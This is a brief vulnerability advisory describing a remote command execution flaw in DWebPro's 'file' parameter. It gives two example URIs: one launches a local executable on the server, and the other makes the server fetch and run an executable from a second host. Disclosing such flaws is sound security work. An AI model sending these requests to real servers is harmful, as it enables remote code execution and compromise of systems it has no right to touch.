DWebPro 'file' Parameter Remote Command Execution Vulnerability

DWebPro 'file' Parameter Remote Command Execution Vulnerability

An attacker can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com:8080/dwebpro/start?file=C:\windows\system32\notepad.exe&params=C:\hi.txt

http://www.example.com:8080/dwebpro/start?file=http://www.example2.com/somefile.exe